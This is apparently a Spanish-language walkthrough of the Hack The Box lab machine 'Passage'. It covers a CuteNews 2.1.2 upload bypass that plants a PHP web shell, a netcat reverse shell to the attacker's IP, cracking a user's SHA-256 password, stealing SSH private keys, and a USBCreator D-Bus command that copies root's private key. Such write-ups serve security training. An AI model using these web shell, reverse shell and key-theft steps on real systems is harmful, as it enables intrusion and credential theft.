# Passage

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

- CuteNews 2.1.2 (RCE)
- File upload vulnerable
- Decodificación base64
- Cracking SHA-256
- USBCreator D-Bus Privilege Escalation

## Nmap Scan

`nmap -Pn -sV -sC 10.10.10.206`

```
Nmap scan report for 10.10.10.206
Host is up (0.13s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
6666/tcp open  irc?
|_irc-info: Unable to open connection
6668/tcp open  tcpwrapped
|_irc-info: Unable to open connection
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Enumerando el puerto **80** podemos ver que la aplicación que esta montada sobre ese puerto es **CuteNews 2.1.2** y nos muestra un formulario de inicio de sesión.

`http://10.10.10.206/CuteNews`

![1](img/1.png)

Después de registrar un usuario se accede a la plataforma donde se ve la opción para subir imágenes.

`http://10.10.10.206/CuteNews/index.php?mod=main&opt=personal`

![2](img/2.png)

### CuteNews 2.1.2 (RCE)

> CuteNews es un sistema de gestión de noticias gratuito, potente y fácil de usar basado en archivos planos como almacenamiento con instalación rápida, función de búsqueda, gestión de carga de archivos, copia de seguridad y restauración, prohibición de IP, soporte de niveles de permisos, protección contra inundaciones, etc.

Investigando exploits públicos sobre la aplicación nos encontramos que es posible hacer bypass de las extensiones de archivos en la función de subir imágenes para conseguir una web shell mediante código PHP.

Procedemos a crear nuestra web shell con el siguiente código.

`echo "GIF8; <?php system($_REQUEST['cmd']) ?>" > doom.php`

![3](img/3.png)

Posteriormente subimos nuestro archivo y como se ve en la siguiente imagen es exitoso.

![4](img/4.png)

Podemos ver los archivos que se subieron en la ruta **/CuteNews/uploads/**, seleccionamos el que tiene nuestro nombre de usuario y le pasamos el parámetro **cmd** con algún comando.

`http://10.10.10.206/CuteNews/uploads/avatar_doom_doom.php?cmd=id`

![5](img/5.png)

Obtenemos una reverse shell mediante la web shell.

- `nc -lvnp 1234`
- `http://10.10.10.206/CuteNews/uploads/avatar_doom_doom.php?cmd=nc -e /bin/sh 10.10.14.239 1234`

![6](img/6.png)

> Podemos obtener una full tty con los siguientes comandos: \
    - python -c "import pty;pty.spawn('/bin/bash')" \
    - ctrl^z \
    - stty raw -echo \
    - fg \
    - reset \
    - export TERM=xterm

### Decodificación base64

En la ruta **/var/www/html/CuteNews/cdata/users** se visualizan varios archivos que tienen como contenido cadenas en base64.

`cd /var/www/html/CuteNews/cdata/users`

![7](img/7.png)

`cat *`

![8](img/8.png)

Al momento de decodificar la cadena nos regresa información de los usuarios registrados en la aplicación. Como en el servidor solo existe el usuario **paul** y **nadav** buscaremos información sobre ellos. Copiaremos toda la salida que arrojo el comando cat y utilizaremos el siguiente script para automatizar el proceso de decodificación.

##### decode.py
```python
import base64

users_file = open('users.txt', 'r')

for user in users_file:
        new_line = user.replace("<?php die('Direct call - access denied'); ?>","")
        user_decode = base64.b64decode(new_line)
        user_utf = user_decode.decode('utf-8')

        if "Paul" in user_utf:
                print(user_utf)
                print('==========================')

users_file.close()
```

`python3 decode.py`

![9](img/9.png)

Nos regresa el registro del usuario Paul y su password encriptado. Procederemos a creackearlo con la herramienta john.

`sudo john paul_hash.txt -wordlist=/usr/share/wordlists/rockyou.txt --format=raw-SHA256`

![10](img/10.png)

Nos cambiamos de usuario.

```
paul : atlanta1
```

`su paul`

![11](img/11.png)

## Escalada de Privilegios (User)

En el directorio **.ssh** se encuentra la llave publica y privada del usuario **nadav**.

- `cat .ssh/id_rsa.pub`
- `cat .ssh/id_rsa`

![12](img/12.png)

Copiamos la llave privada a nuestra máquina, le damos permisos de lectura y nos conectamos por SSH.

- `chmod 400 nadav_id_rsa`
- `ssh -i nadav_id_rsa nadav@10.10.10.206`

![13](img/13.png)

## Escalada de Privilegios (Root)

Revisando los procesos que se ejecutan como root podemos ver uno interesante.

`ps aux | grep root`

![14](img/14.png)

### USBCreator D-Bus

> Startup Disk Creator (USB-creator) es una herramienta oficial para crear Live USB de Ubuntu desde el Live CD o desde una imagen ISO. La herramienta se incluye de forma predeterminada en todas las versiones posteriores a Ubuntu 8.04 y se puede instalar en Ubuntu 8.04. 

Investigando sobre que se trata ese proceso y como tomar ventaja llegamos a este [articulo](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in) que explica todo el proceso.

La vulnerabilidad consiste en que un atacante con acceso a un usuario en el grupo sudoer eluda la política de seguridad de password impuesta por el programa sudo. La vulnerabilidad permite a un atacante sobrescribir archivos arbitrarios con contenido arbitrario, como root, sin proporcionar una contraseña.

Usando el siguiente comando podemos obtener la llave privada del usuario root para posteriormente conectaremos por SSH.

```
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/.doom true
```

![15](img/15.png)

- `chmod 400 root_id_rsa`
- `ssh -i root_id_rsa root@10.10.10.206`

![16](img/16.png)

## Referencias
https://www.exploit-db.com/exploits/46698 \
https://www.exploit-db.com/exploits/48800 \
https://github.com/xapax/security/blob/master/bypass_image_upload.md \
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/